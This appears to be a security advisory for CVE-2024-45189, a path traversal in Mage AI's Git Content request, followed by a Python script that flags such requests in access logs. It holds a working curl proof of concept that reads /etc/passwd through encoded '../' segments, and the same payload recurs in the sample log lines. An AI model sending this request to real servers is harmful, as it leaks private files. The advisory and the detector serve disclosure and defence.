description: CVE-2024-45189, MEDIUM, Mage AI git content request remote arbitrary file leak
title: Mage AI git content request remote arbitrary file leak
date_published: 2024-08-23
last_updated: 2024-08-23
xray_id: JFSA-2024-001039604
vul_id: CVE-2024-45189
cvss: 6.5
severity: medium
discovered_by: Ori Hollander
type: vulnerability

Summary

Mage AI git content request remote arbitrary file leak

Component

mage-ai

Affected versions

(,)

Description

Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Git Content" request.

PoC

curl -X GET \
  'http://localhost:6789/api/git_file/..%2F..%2Fetc%2Fpasswd?api_key=<USER API KEY>' \
  -H 'Authorization: Bearer <USER TOKEN>'
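
A log check for the request shape in the PoC above, as an added example that is not part of the original advisory or of Mage AI's code: it flags `/api/git_file/` requests whose percent-decoded file parameter contains a `..` segment. It assumes a reverse proxy in front of Mage writes combined-format access logs; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Route prefix taken from the PoC on this page.
GIT_FILE_PREFIX = "/api/git_file/"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so nested encoding is unwrapped too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal_request(target):
    """True if a git_file request target has a '..' segment after decoding."""
    path = urlsplit(target).path  # urlsplit leaves percent-escapes untouched
    if not path.startswith(GIT_FILE_PREFIX):
        return False
    file_param = decode_fully(path[len(GIT_FILE_PREFIX):]).replace("\\", "/")
    return ".." in file_param.split("/")

def flag_log_lines(lines):
    """Return the log lines whose request looks like a git_file traversal."""
    flagged = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and is_traversal_request(match.group("target")):
            flagged.append(line)
    return flagged

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Aug/2024:10:00:01 +0000] "GET /api/git_file/..%2F..%2Fetc%2Fpasswd?api_key=REDACTED HTTP/1.1" 200 1843',
    '203.0.113.7 - - [23/Aug/2024:10:00:05 +0000] "GET /api/git_file/pipelines%2Fetl%2Fmetadata.yaml?api_key=REDACTED HTTP/1.1" 200 512',
    '198.51.100.4 - - [23/Aug/2024:10:01:12 +0000] "GET /api/pipelines?api_key=REDACTED HTTP/1.1" 200 9921',
]

if __name__ == "__main__":
    for hit in flag_log_lines(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned status 200 is the case to triage first, since it indicates the server answered the traversal path rather than rejecting it.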

Vulnerability Mitigations

No mitigations are supplied for this issue

References

No references are supplied for this issue